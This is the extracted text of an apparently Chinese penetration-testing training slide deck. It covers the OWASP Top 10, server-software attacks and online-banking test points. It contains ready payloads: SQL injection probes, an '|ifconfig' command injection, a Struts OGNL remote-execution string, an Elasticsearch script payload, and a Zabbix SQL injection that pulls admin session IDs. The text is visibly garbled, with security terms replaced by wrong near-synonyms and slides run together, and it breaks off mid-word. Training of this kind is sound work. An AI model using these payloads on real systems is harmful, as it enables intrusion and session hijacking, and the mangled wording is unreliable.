信息安全技術(shù)培訓(xùn)滲透測試

信息平安技術(shù)培訓(xùn)——浸透測試、演示劉冬-3-28V

第一頁，共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第二頁，共80頁。什么是浸透測試浸透測試〔PenetrationTesting〕——是為了證明網(wǎng)絡(luò)防御按照預(yù)期方案正常運(yùn)行而提供的一種機(jī)制。實(shí)現(xiàn)原理： 根據(jù) 對或未知破綻測試、模擬攻擊 目地 重點(diǎn)：降低風(fēng)險(xiǎn)、完善目前的平安策略 特點(diǎn) 人工檢測、工具掃描、可控非破壞第三頁，共80頁。什么是浸透測試浸透測試流程

第四頁，共80頁。浸透測試浸透測試工具

BurpSuiteHttpAnalvzerIEWatchFiddlerFireBugCharlesHttpliveheadersSQLmapNmapAwvsAppscanHP-WebinspectCoreImpactMetasploitNessusNexpose第五頁，共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第六頁，共80頁。基于Web浸透測試掃描解析輸入Web主機(jī)風(fēng)險(xiǎn)信息搜集解析應(yīng)用程序分析應(yīng)用程序，會話機(jī)制、客戶端控件等SQL、XSS、RFI等測試代理、配置不當(dāng)，中間件等識別分析與利用第七頁，共80頁。HackingOWASPTOP10注入破綻跨站腳本失效的身份驗(yàn)證和回話管理不平安的直接對象引用CSRF平安配置錯(cuò)誤不平安的加密存儲沒有限制URL訪問傳輸層保護(hù)缺乏未驗(yàn)證的重定向和轉(zhuǎn)發(fā)第八頁，共80頁。Hacking注入破綻——SQL注入Select*fromtable_namewhereid=1Select*fromtable_namewhereid=1’Select*fromtable_namewhereid=1

and1=1Select*fromtable_namewhereid=1and1=2Select*fromtable_namewhereid=1and(select……)InjectionTools:1、SQLHelper2、SQLMAP(v1.0d)第九頁，共80頁。Hacking注入破綻——SQL注入事實(shí)上，對錯(cuò)誤信息進(jìn)展封裝并不一定能阻止攻擊者的入侵行為，封裝的錯(cuò)誤信息，但是攻擊己經(jīng)形成，有攻擊者能根據(jù)封裝的錯(cuò)誤信息對攻擊結(jié)果進(jìn)展判斷，繼續(xù)施行攻擊。其實(shí)盲注就是通過封裝的消息來搜集攻擊過程中需要的信息。第十頁，共80頁。Hacking注入破綻——命令注入POST/aim/synRequest.doHTTP/1.1????method=trace_route&ip=&m=5&w=2|ifconfig11第十一頁，共80頁。Hacking跨站腳本存儲型反射型DOM型12第十二頁，共80頁。Hacking跨站腳本原理簡單，利用卻不簡單WEB2.0是XSS的新溫床XSS/CSRFWORM：Samyworm&Sinaweiboworm1、跨站URL：2、由JS發(fā)起CSRF：a、發(fā)微博b、加關(guān)注c、發(fā)私信AboutSamyWorm::///wiki/Samy_(XSS)13第十三頁，共80頁。Hacking任意文件讀取14第十四頁，共80頁。Hacking任意文件讀取15第十五頁，共80頁。Hacking任意文件讀取16第十六頁，共80頁。Hacking任意文件讀取17第十七頁，共80頁。Hacking任意文件讀取18第十八頁，共80頁。Hacking上傳破綻——修改參數(shù)19第十九頁，共80頁。Hacking上傳破綻——欺騙20第二十頁，共80頁。Hacking上傳破綻——APP客戶端21第二十一頁，共80頁。Hacking認(rèn)證錯(cuò)誤——原始信息的校驗(yàn)方式1、不校驗(yàn)——直接構(gòu)造惡意數(shù)據(jù)修改密碼2、校驗(yàn)COOKIE——CSRF22第二十二頁，共80頁。Hacking目錄遍歷——挪動(dòng)代理效勞器第二十三頁，共80頁。Hacking錯(cuò)誤信息——“友好〞的返回信息24第二十四頁，共80頁。Hacking錯(cuò)誤信息——HTTPFuzzing對錯(cuò)誤信息的利用25第二十五頁，共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別://site/d477340ffa28755c?OpenDocument://site/d477340ffa28755c?EditDocumentOpenDocumentEditDocument第二十六頁，共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別第二十七頁，共80頁。Hacking參數(shù)錯(cuò)誤——權(quán)限的鑒別第二十八頁，共80頁。Hacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤獲取驗(yàn)證碼為5為純數(shù)字，有效期為30分鐘，可以暴力破解。通過HTTPFUZZING獲得第二十九頁，共80頁。Hacking邏輯錯(cuò)誤第三十頁，共80頁。Hacking邏輯錯(cuò)誤一個(gè)密碼找回的邏輯錯(cuò)誤第三十一頁，共80頁。Hacking邏輯錯(cuò)誤修改任意賬號密碼第三十二頁，共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試33第三十三頁，共80頁?；ヂ?lián)網(wǎng)攻擊常見的DjangoCacti0dayFreenasHudsonSquidBeanshellZabbixJboss …第三十四頁，共80頁。互聯(lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示如何利用Struts進(jìn)入你的效勞器?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}第三十五頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示36第三十六頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示夢網(wǎng)合作自助效勞12590遠(yuǎn)程代碼執(zhí)行37第三十七頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Struts演示挪動(dòng)學(xué)院38第三十八頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Heartbleed、1.0.1a、1.0.1b、1.0.1c、1.0.1d、、、等版本39第三十九頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SplunkXSSOpenSSLTLS心跳信息泄漏破綻未受權(quán)訪問代碼執(zhí)行40第四十頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Splunk代碼執(zhí)行41第四十一頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防SAP破綻演示SAPNetWeaver是基于專業(yè)標(biāo)準(zhǔn)的集成化應(yīng)用平臺，可以大幅度降低系統(tǒng)整合的復(fù)雜性。其組件包括門戶、應(yīng)用效勞器、商務(wù)智能解決方案以及系統(tǒng)整合和數(shù)據(jù)整合技術(shù)。42第四十二頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hadoop通過hadoop,hbase，hdfs0.2RC版本的管理web端能遠(yuǎn)程執(zhí)行命令，通過該節(jié)點(diǎn)對集群效勞器進(jìn)展任務(wù)分發(fā)〔該是根本功能，當(dāng)然可以進(jìn)展批量提權(quán)l(xiāng)inux主機(jī)〕浸透進(jìn)hadoop集群。43第四十三頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Elasticsearch:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystProperty(\%22\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}44第四十四頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zend,ThkphpZendframework讀取任意文件Demo選擇的原因:腳本小子只會讀取任意文件，高級黑客能拿來做什么？內(nèi)網(wǎng)端口掃描內(nèi)網(wǎng)效勞器攻擊HTTP攻擊暴力破解45第四十五頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Cacti0day如何利用Cacti進(jìn)入你的效勞器0day46第四十六頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防ZabbixZabbix弱口令SQl注入mon.php?applications=2and(select1from(selectcount(*),concat((select(selectconcat(cast(concat(sessionid,0x7e,userid,0x7e,status)aschar),0x7e))fromzabbix.sessionswherestatus=0anduserid=1LIMIT0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)第四十七頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Zenoss第四十八頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Hudson創(chuàng)立任務(wù)Buildamaven2projectBuild寫入execwinshellBuildnow://ip:8080/Buildsconsole第四十九頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防HudsonHiveHQL可以通過transform自定義Hive使用的Map/Reduce腳本，從而調(diào)用shell/python等語言，默認(rèn)皆可用，導(dǎo)致攻擊者可以通過hive接口等相關(guān)操作方式直接獲取效勞器權(quán)限。第五十頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Jboss認(rèn)證繞過控制臺密碼JMXinvokerServlet第五十一頁，共80頁?；ヂ?lián)網(wǎng)攻擊LDAP

52第五十二頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防Rsync,NFSCMS生成html靜態(tài)文件通過rsync發(fā)布DemoNFS破綻利用…53第五十三頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防VmwareVMwarevCenterOrchestrator在Web管理工具的實(shí)現(xiàn)上存在平安破綻，可被利用泄露vCenter效勞器密碼。54第五十四頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5在多家銀行測試發(fā)現(xiàn)，導(dǎo)致內(nèi)網(wǎng)信息泄露第五十五頁，共80頁?；ヂ?lián)網(wǎng)攻擊互聯(lián)網(wǎng)攻防F5登陸繞過驗(yàn)證F5多種設(shè)備和等多個(gè)版本的ssh登錄存在root帳號繞過驗(yàn)證的重大破綻第五十六頁，共80頁。什么是浸透測試應(yīng)用程序浸透測試方法互聯(lián)網(wǎng)攻擊常見手段金融行業(yè)平安測試第五十七頁，共80頁。常見破綻SQL注入Xss跨站腳本攻擊1元購置任意商品查看任意賬號支付額度修改任意用戶密碼轉(zhuǎn)賬破綻查看任意賬號的賬戶金額查看任意用戶的身份信息短信炸彈……

這種可能性有多大？第五十八頁，共80頁。其他方向SSRF(效勞端懇求偽造)假如你的ERP有破綻，并且存在一個(gè)XXE的破綻那么它通過一個(gè)webservices來攻擊你的內(nèi)部核心ERP.第五十九頁，共80頁。其他方向SSRF(效勞端懇求偽造)ORACLEpeoplesoft環(huán)境克隆導(dǎo)致的問題ORACLEERP默認(rèn)密碼ORACLEERP權(quán)限問題ORACLEERPiscript問題ORACLEERP中間件問題ORACLEERP數(shù)據(jù)庫問題第六十頁，共80頁。其他方向Pentesting攻防HaddoopOpenstackSpringHibernateIbatisMongodb…第六十一頁，共80頁。其他方向設(shè)計(jì)缺陷弱口令未受權(quán)訪問敏感信息網(wǎng)絡(luò)浸透環(huán)境配置不合理致命危害權(quán)限繞過拓?fù)鋱D泄露識別分析與利用第六十二頁，共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)--業(yè)務(wù)復(fù)雜容易產(chǎn)生業(yè)務(wù)的邏輯平安問題--問題ALL輸入測試測試方法：提交惡意參數(shù)，觀察返回結(jié)果第六十三頁，共80頁。某商行網(wǎng)銀浸透測試結(jié)果第六十四頁，共80頁。某商行APP浸透測試結(jié)果第六十五頁，共80頁。權(quán)限控制破綻最常見和最普遍的破綻，重點(diǎn)測試通過越權(quán)的查詢操作可導(dǎo)致未受權(quán)的用戶直接訪問不應(yīng)用訪問的資源，導(dǎo)致一些敏感信息的泄露，其中包括查詢其他賬戶余額查詢其他賬戶積分查詢其他賬戶身份信息查詢其他賬戶的其他相關(guān)信息平安測試第六十六頁，共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)--平安控件測試使用ComRaider測試ActiveX控件平安密碼控件是否有防鍵盤記錄功能登錄點(diǎn)測試加密控件是否有對密碼進(jìn)展加密企業(yè)網(wǎng)銀繞過key保護(hù)第六十七頁，共80頁。平安測試應(yīng)用系統(tǒng)破綻測試點(diǎn)數(shù)據(jù)校驗(yàn)問題使用提交異常數(shù)據(jù)進(jìn)展測試提交負(fù)數(shù)/超大轉(zhuǎn)賬金額提交負(fù)數(shù)/超大積分賬戶控制積分轉(zhuǎn)換輸入輸出賬戶互換轉(zhuǎn)賬輸入輸